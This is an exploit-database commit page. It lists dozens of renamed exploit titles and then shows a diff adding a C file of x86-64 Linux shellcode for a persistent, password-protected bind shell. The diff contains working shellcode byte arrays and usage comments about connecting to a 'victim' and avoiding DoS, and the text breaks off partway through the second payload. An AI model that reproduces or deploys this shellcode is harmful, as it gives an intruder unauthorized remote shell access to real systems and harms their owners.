DB: 2016-07-20
4 new exploits Microsoft Internet Explorer Object Tag Exploit (MS03-020) Microsoft Internet Explorer - Object Tag Exploit (MS03-020) ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm) ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm) Cisco IOS IPv4 Packets Denial of Service Exploit Cisco IOS - IPv4 Packets Denial of Service Exploit Cisco IOS (using hping) Remote Denial of Service Exploit Cisco IOS - (using hping) Remote Denial of Service Exploit Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031) Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031) Microsoft Windows RPC DCOM Remote Exploit (18 Targets) Microsoft Windows RPC - DCOM Remote Exploit (18 Targets) man-db 2.4.1 open_cat_stream() Local uid=man Exploit man-db 2.4.1 - open_cat_stream() Local uid=man Exploit Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit DameWare Mini Remote Control Server SYSTEM Exploit DameWare Mini Remote Control Server - SYSTEM Exploit Microsoft Internet Explorer Object Data Remote Exploit (M03-032) Microsoft Internet Explorer - Object Data Remote Exploit (M03-032) eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit Microsoft WordPerfect Document Converter Exploit (MS03-036) Microsoft WordPerfect Document Converter - Exploit (MS03-036) Roger Wilco 1.x Client Data Buffer Overflow Exploit Roger Wilco 1.x - Client Data Buffer Overflow Exploit Solaris Sadmind Default Configuration Remote Root Exploit Solaris Sadmind - Default Configuration Remote Root Exploit Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043) Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043) Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046) Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051) Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051) Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049) Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service Remote Exploit (MS03-049) Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049) Microsoft Windows Messenger Service Remote Exploit FR (MS03-043) Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043) GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit Eudora 6.0.3 Attachment Spoofing Exploit (windows) Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit Eudora 6.0.3 - Attachment Spoofing Exploit (Windows) Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit OpenBSD 2.6 - / 2.7ftpd Remote Exploit OpenBSD 2.6 / 2.7ftpd - Remote Exploit Redhat 6.1 - / 6.2 TTY Flood Users Exploit Redhat 6.1 / 6.2 - TTY Flood Users Exploit Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit Solaris 7 - / 8-beta arp Local Overflow Exploit Solaris 7 / 8-beta - arp Local Overflow Exploit Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit Cisco Multiple Products Automated Exploit Tool Cisco Multiple Products - Automated Exploit Tool Microsoft Internet Explorer (11 bytes) Denial of Service Exploit Microsoft Internet Explorer - Denial of Service Exploit (11 bytes) PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated) VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated) GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2) WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1) Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html) Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl) Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php) Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html) ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated) phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (2) Microsoft Windows - ACLs Local Privilege Escalation Exploit (Updated) Microsoft Windows - ACLs Local Privilege Escalation Exploit (2) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (updated) HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2) phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit phpBB Journals System Mod 1.0.2 RC2 - Remote File Include Exploit Mozilla Firefox <= 1.5.0.7/ 2.0 - (createRange) Remote DoS Exploit Mozilla Firefox <= 1.5.0.7/2.0 - (createRange) Remote DoS Exploit BrowseDialog Class (ccrpbds6.dll) Multiple Methods DoS Exploit BrowseDialog Class - (ccrpbds6.dll) Multiple Methods DoS Exploit Asterisk <= 1.2.15 - / 1.4.0 pre-auth Remote Denial of Service Exploit Asterisk <= 1.2.15 / 1.4.0 - pre-auth Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 WDDX Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - php_binary Session Deserialization Information Leak PHP < 4.4.5 - / 5.2.1 - WDDX Session Deserialization Information Leak PHP <= 4.4.6 - / 5.2.1 array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit PHP <= 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit Asterisk <= 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service Exploit PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 - / 5.2.1 - _SESSION Deserialization Overwrite Exploit PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC PHP 4.4.5 / 4.4.6 - session_decode() Double Free Exploit PoC XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit XOOPS Module MyAds Bug Fix <= 2.04jp - (index.php) SQL Injection Exploit Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities Kaqoo Auction - (install_root) Multiple Remote File Include Vulnerabilities Asterisk < 1.2.22 - / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities Weblogicnet - (files_dir) Multiple Remote File Inclusion Vulnerabilities PHP <= 4.4.7 - / 5.2.3 MySQL/MySQLi Safe Mode Bypass PHP <= 4.4.7 / 5.2.3 - MySQL/MySQLi Safe Mode Bypass EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites EB Design Pty Ltd - (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites Lama Software (14.12.2007) Multiple Remote File Inclusion Vulnerabilities Lama Software 14.12.2007 - Multiple Remote File Inclusion Vulnerabilities sCssBoard (pwnpack) Multiple Versions Remote Exploit sCssBoard - (pwnpack) Multiple Versions Remote Exploit Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities Keller Web Admin CMS 0.94 Pro Local File Inclusion Keller Web Admin CMS 0.94 Pro - Local File Inclusion Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st) \o - Local File Inclusion (1st) HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1) Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Mac OS X - Java applet Remote Deserialization Remote PoC (Updated) Mac OS X - Java applet Remote Deserialization Remote PoC (2) ZaoCMS (user_updated.php) Remote Change Password Exploit ZaoCMS - (user_updated.php) Remote Change Password Exploit eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities phpdirectorysource (XSS/SQL) Multiple Vulnerabilities phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android) Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android) GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC) Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC) phpMySite (XSS/SQLi) Multiple Vulnerabilities phpMySite - (XSS/SQLi) Multiple Vulnerabilities (Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit (Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities Open Web Analytics 1.2.3 multi file include Open Web Analytics 1.2.3 - multi file include Scratcher (SQL/XSS) Multiple Remote Scratcher - (SQL/XSS) Multiple Remote phpscripte24 Live Shopping Multi Portal System SQL Injection Exploit phpscripte24 Live Shopping Multi Portal System - SQL Injection Exploit e-webtech (fixed_page.asp) SQL Injection e-webtech - (fixed_page.asp) SQL Injection parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities parlic Design - (SQL/XSS/HTML) Multiple Vulnerabilities MileHigh Creative (SQL/XSS/HTML Injection) Multiple Vulnerabilities MileHigh Creative - (SQL/XSS/HTML Injection) Multiple Vulnerabilities CMScout (XSS/HTML Injection) Multiple Vulnerabilities CMScout - (XSS/HTML Injection) Multiple Vulnerabilities k-search (SQL/XSS) Multiple Vulnerabilities k-search - (SQL/XSS) Multiple Vulnerabilities GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities GuestBook Script PHP - (XSS/HTML Injection) Multiple Vulnerabilities Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities Max's Guestbook - (HTML Injection/XSS) Multiple Vulnerabilities Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_jefaqpro) - Multiple Blind SQL Injection Vulnerabilities Joomla Component (com_restaurantguide) Multiple Vulnerabilities Joomla Component - (com_restaurantguide) Multiple Vulnerabilities TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities TradeMC E-Ticaret - (SQL/XSS) Multiple Vulnerabilities Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities Projekt Shop - (details.php) Multiple SQL Injection Vulnerabilities CakePHP <= 1.3.5 - / 1.2.8 unserialize() CakePHP <= 1.3.5 / 1.2.8 - unserialize() Rae Media Real Estate Multi Agent SQL Injection Rae Media Real Estate Multi Agent - SQL Injection Solaris ypupdated Command Execution Solaris - ypupdated Command Execution CakePHP <= 1.3.5 - / 1.2.8 Cache Corruption Exploit CakePHP <= 1.3.5 / 1.2.8 - Cache Corruption Exploit Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities Joomla HM-Community - (com_hmcommunity) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities CyberLink Multiple Products File Project Handling Stack Buffer Overflow PoC CyberLink Multiple Products - File Project Handling Stack Buffer Overflow PoC Ruby on Rails ActionPack Inline ERB Code Execution Ruby on Rails ActionPack Inline ERB - Code Execution HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 RPC.YPUpdated Command Execution (2) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (1) HP-UX 10/11_IRIX 3/4/5/6_OpenSolaris build snv_Solaris 8/9/10_SunOS 4.1 - RPC.YPUpdated Command Execution (2) ASTPP VoIP Billing (4cf207a) Multiple Vulnerabilities ASTPP VoIP Billing (4cf207a) - Multiple Vulnerabilities Drummond Miles A1Stats 1.0 a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 a1disp4.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp2.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp3.cgi Traversal Arbitrary File Read Drummond Miles A1Stats 1.0 - a1disp4.cgi Traversal Arbitrary File Read Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities Oracle WebCenter Sites (FatWire Content Server) - Multiple Vulnerabilities Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness Microsoft URLScan 2.5/RSA Security SecurID 5.0 - Configuration Enumeration Weakness WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service VocalTec VGW120/ VGW480 Telephony Gateway Remote H.225 - Denial of Service VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service Web Wiz Multiple Products SQL Injection Web Wiz Multiple Products - SQL Injection RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities RealNetworks Multiple Products - Multiple Buffer Overflow Vulnerabilities Geodesic Solutions Multiple Products index.php b Parameter SQL Injection Geodesic Solutions Multiple Products - index.php b Parameter SQL Injection HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload HP ProCurve Manager - SNAC UpdateDomainControllerServlet File Upload Linux Kernel 2.6.x (<= 2.6.17.7) - NFS and EXT3 Combination Remote Denial of Service Linux Kernel <= 2.6.17.7 - NFS and EXT3 Combination Remote Denial of Service Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness Apache HTTP Server <= 1.3.35 / <= 2.0.58 / <= 2.2.2 - Arbitrary HTTP Request Headers Security Weakness Symantec Multiple Products SymEvent Driver Local Denial of Service Symantec Multiple Products - SymEvent Driver Local Denial of Service FreeBSD 5.x I386_Set_LDT() Multiple Local Denial of Service Vulnerabilities FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - cgi-bin Remote Code Execution Exploit Apache + PHP < 5.3.12 & < 5.4.2 - cgi-bin Remote Code Execution Exploit Apache + PHP 5.x (< 5.3.12 & < 5.4.2) - Remote Code Execution (Multithreaded Scanner) Apache + PHP < 5.3.12 & < 5.4.2 - Remote Code Execution (Multithreaded Scanner) PHP Multi User Randomizer 2006.09.13 Configure_Plugin.TPL.php Cross-Site Scripting PHP Multi User Randomizer 2006.09.13 - Configure_Plugin.TPL.php Cross-Site Scripting Symantec Multiple Products SPBBCDrv Driver Local Denial of Service Symantec Multiple Products - SPBBCDrv Driver Local Denial of Service Exponent CMS 0.96.5/ 0.96.6 magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/ 0.96.6 iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Exponent CMS 0.96.5/0.96.6 - magpie_debug.php url Parameter XSS Exponent CMS 0.96.5/0.96.6 - magpie_slashbox.php rss_url Parameter XSS Exponent CMS 0.96.5/0.96.6 - iconspopup.php icodir Variable Traversal Arbitrary Directory Listing Simple OS CMS 0.1c_beta 'login.php' SQL Injection Simple OS CMS 0.1c_beta - 'login.php' SQL Injection WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow Blog Ink (Blink) Multiple SQL Injection Vulnerabilities Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities PHP Scripts Now Multiple Products bios.php rank Parameter XSS PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection PHP Scripts Now Multiple Products - bios.php rank Parameter XSS PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock) PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock) PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS ManageEngine Multiple Products Authenticated File Upload ManageEngine Multiple Products - Authenticated File Upload BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow) Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow) Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities AirLive Multiple Products OS Command Injection AirLive Multiple Products - OS Command Injection Sciretech Multiple Products Multiple SQL Injection Vulnerabilities Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes) Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes) Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution Linux/x86-64 - Syscall Persistent Bind Shell + (Multi-terminal) + Password + Daemon (83_ 148_ 177 bytes) Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit NewsP Free News Script 1.4.7 - User Credentials Disclosure newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure
This commit is contained in:
Offensive Security
parent
acd30ed451
commit
965b4bba8f
5 changed files with 2086 additions and 162 deletions
161
platforms/lin_x86-64/shellcode/40122.txt
Executable file
161
platforms/lin_x86-64/shellcode/40122.txt
Executable file
|
|
@ -0,0 +1,161 @@
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
//| Exploit Title: [Syscall Persistent Bind Shell + (multi-terminal) + password + daemon (83, 148, 177 bytes)]
|
||||||
|
//| Date: [7/15/2016]
|
||||||
|
//| Exploit Author: [CripSlick]
|
||||||
|
//| Tested on: [Kali 2.0 x86_x64]
|
||||||
|
//| Version: [No Program Version, Only Syscalls Used]
|
||||||
|
|
||||||
|
//| ShepherdDowling@gmail.com
|
||||||
|
//| OffSec ID: OS-20614
|
||||||
|
//| http://50.112.22.183/
|
||||||
|
|
||||||
|
|
||||||
|
//|=========================================================================================
|
||||||
|
//|=============== CripSlick's Persistent Bind-Shell with Port-Range + password ============
|
||||||
|
//|
|
||||||
|
//|
|
||||||
|
//| CODE 3 Has everything to offer that CODE2 has and more. CODE2 has everything to offer
|
||||||
|
//| that CODE1 has and more. CODE1 is still great due to being a very short bind shell.
|
||||||
|
//| The point is that that there is really ONLY 1 shellcode here, it is just that CODE2 &
|
||||||
|
//| CODE1 have less features to cut down on byte count giving you more options.
|
||||||
|
//|
|
||||||
|
//| Troubleshooting:
|
||||||
|
//| 1. Problem: A lot of ports appeared on "nmap <IPv4> -p-" but not my port?
|
||||||
|
//| 1. Answer: This is common when you swap the high and low port
|
||||||
|
//|
|
||||||
|
//| 2. Problem: I disconnected and can't reconnect (even when I use the right password)
|
||||||
|
//| 2. Answer: This is common when re-executing the program (even after making changes)
|
||||||
|
//| Solve this by closing the terminal completly out, going to your directory
|
||||||
|
//| recompiling the program and then relaunching.
|
||||||
|
//|
|
||||||
|
//| If it is because you typed in the password wrong, wait about 60 seconds to
|
||||||
|
//| re-connect. No re-execution of the program is required to reconnect for
|
||||||
|
//| CODE2 & CODE3.
|
||||||
|
//|
|
||||||
|
//| 3. Problem: I DoS'd the victim
|
||||||
|
//| 3. Answer: This probably was because you set the port range too broad. A broad port range
|
||||||
|
//| takes a lot of CPU power. I suggest keeping it to how many terminals you need.
|
||||||
|
//|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#define PORT "\x11\x5a" // FORWARD BYTE ORDER
|
||||||
|
//| PORT: 4442
|
||||||
|
#define PASSWORD "\x6c\x61\x20\x63\x72\x69\x70\x73" // FORWARD BYTE ORDER
|
||||||
|
//| PASSWORD = "la crips"
|
||||||
|
|
||||||
|
//| ONLY CODE3 DOES NOT USE "PORT"; IT USES "LOW_PORT" & "HIGH_PORT"
|
||||||
|
#define HIGH_PORT "\x5f\x11" // REVERSE BYTE ORDER
|
||||||
|
#define LOW_PORT "\x5b\x11" // REVERSE BYTE ORDER
|
||||||
|
//| PORTS: 4443-4447 (remember 4443 doesn't count so 4444-4447)
|
||||||
|
//| (remember to use one terminal connection per open port)
|
||||||
|
|
||||||
|
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
|
||||||
|
//| =========================================================================
|
||||||
|
//| CODE1 The short bind shell (83 bytes)
|
||||||
|
//| =========================================================================
|
||||||
|
//| This is the shortest bind-shell I could make. I leaned that mov byte takes
|
||||||
|
//| two bytes while Push+Pop takes 3 so I used more moves. Push+Pop is good if
|
||||||
|
//| you don't want to xor a register but your stack must be NULL on top.
|
||||||
|
//| This code only supports one terminal.
|
||||||
|
|
||||||
|
unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|
||||||
|
"\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e\xb0\x29\x0f\x05\x48"
|
||||||
|
"\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e\x52\xb2\x10\xb0\x31"
|
||||||
|
"\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40\x88\xc7\x40\xb6\x03"
|
||||||
|
"\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x50\x48\xbb"
|
||||||
|
"\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
|
||||||
|
|
||||||
|
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!=======================
|
||||||
|
//| =========================================================================
|
||||||
|
//| CODE2 Persistent bind shell with a password (148 bytes)
|
||||||
|
//| =========================================================================
|
||||||
|
//| Supports re-connecting after a disconnect (close terminal and open up again)
|
||||||
|
//| If you type in a password wrong, wait 60 seconds to reconnect.
|
||||||
|
//| If you close the terminal after you enter the correct password, you can
|
||||||
|
//| immediatly reconnect.
|
||||||
|
//| This code only supports one terminal.
|
||||||
|
|
||||||
|
|
||||||
|
unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
|
||||||
|
"\x48\x31\xff\x48\xf7\xe7\x48\x31\xf6\x6a\x39\x58\x0f\x05\x48\x31\xff"
|
||||||
|
"\x48\x39\xf8\x74\x79\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x6a\x01\x5e"
|
||||||
|
"\xb0\x29\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"PORT"\x54\x5e"
|
||||||
|
"\x52\xb2\x10\xb0\x31\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x40"
|
||||||
|
"\x88\xc7\x40\xb6\x03\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x89\xc7\x48"
|
||||||
|
"\x89\xc6\x48\x8d\x74\x24\xf0\x6a\x10\x5a\x0f\x05\x48\xb8"PASSWORD""
|
||||||
|
"\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7"
|
||||||
|
